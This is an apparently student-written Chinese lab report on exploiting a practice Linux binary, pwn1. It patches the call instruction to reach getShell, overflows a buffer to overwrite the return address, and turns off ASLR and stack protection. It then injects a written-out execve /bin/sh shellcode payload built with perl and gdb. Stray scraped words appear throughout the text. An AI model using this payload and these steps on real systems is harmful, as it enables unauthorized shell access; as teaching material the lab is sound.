运行pwn1可执行文件中的getshell函数,学习如何注入运行任何Shellcode
本次实践的对象是一个名为pwn1的linux可执行文件。linux
机器码shell
机器码 | 指令功能 |
---|---|
38 | CMP reg8/mem8,reg8 |
39 | CMP reg16/mem16,reg16 |
3A | CMP reg8,reg8/mem8 |
3B | CMP reg16,reg16/mem16 |
3C | CMP al,immed8 |
3D | CMP ax,immed16 |
首先对pwn1
文件进行反汇编windows
查看main函数调用foo的地址值,foo函数的第一条指令的地址值,和须要修改的getShell函数第一条指令的地址值。由下图可知,main函数调用foo对应机器指令为e8 d7ffffff
,因为要将调用的函数更改成getShell,则需修改d7 ff ff ff
为getShell-80484ba
对应的补码,经过计算47d-4ba
获得补码,main函数调用getShell对应机器指令为c3 ff ff ff
。
网络
使用VIM编辑器对pwn1
文件进行编辑。文件显示为乱码,用%!xxd
命令将显示模式切换为16进制模式
dom
输入/e8 d7
查找要修改的内容,修改d7
为c3
,用命令%!xxd -r
将16进制转换为原格式,wq
存盘退出。
编辑器
80484b5
的机器指令d7
变动为c3
,main函数调用getShell
运行文件。(在实践过程当中从新备份了pwn1文件为pwn2,以上步骤为备份前截图,备份后将pwn1文件修改成原文件。)函数
目标:触发getShell
函数学习
pwn1
可执行文件正常运行是调用以下函数foo,这个函数有Buffer overflow漏洞spa
读入字符串,但系统只预留了__字节的缓冲区,超出部分会形成溢出,咱们的目标是覆盖返回地址3d
main函数中call调用foo,同时在堆栈上压上返回地址值:80484ba
gdb pwn3_155330
调试可执行文件,r
运行,info r
查看寄存器eip(即将执行的指令地址)的值
再次运行,将后八位值更改后发现eip值改变。1234 四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。将这四个字符替换为 getShell 的内存地址,输给pwn,pwn1就会运行getShell。
0804847d
。接下来要确认下字节序,简单说是输入\x08\x04\x84\x7d
,仍是输入\x7d\x84\x04\x08
。对比以前的eip,该终端采用小端方式,正确应用输入\x7d\x84\x04\x08
。\x7d\x84\x04\x08
这样的16进制值,因此先生成包括这样字符串的一个文件。\x0a
表示回车,若是没有的话,在程序运行时就须要手工按一下回车键。>
到input
文件中。execstack -s pwn1
设置堆栈可执行。
apt-get install execstack
获取安装。
execstack -q pwn1
查询文件的堆栈是否可执行。并依次执行如下命令。
more /proc/sys/kernel/randomize_va_space echo "0" > /proc/sys/kernel/randomize_va_space more /proc/sys/kernel/randomize_va_space
构造要注入的payload。
由于retaddr在缓冲区的位置是固定的,shellcode要不在它前面(缓冲区大),要不在它后面(缓冲区小)。
输入perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
,最后的\x4\x3\x2\x1
将覆盖到堆栈上的返回地址的位置。把\x4\x3\x2\x1
改成这段shellcode的地址。
(cat input_shellcode;cat) | ./pwn4_155330
ps -ef | grep pwn4_155330
查看进程号。grep pwn4_155330
的进程号是2481
设置断点
继续运行
查看esp寄存器值,
计算出地址值为d300
,修改地址重定向到input_shellcode文件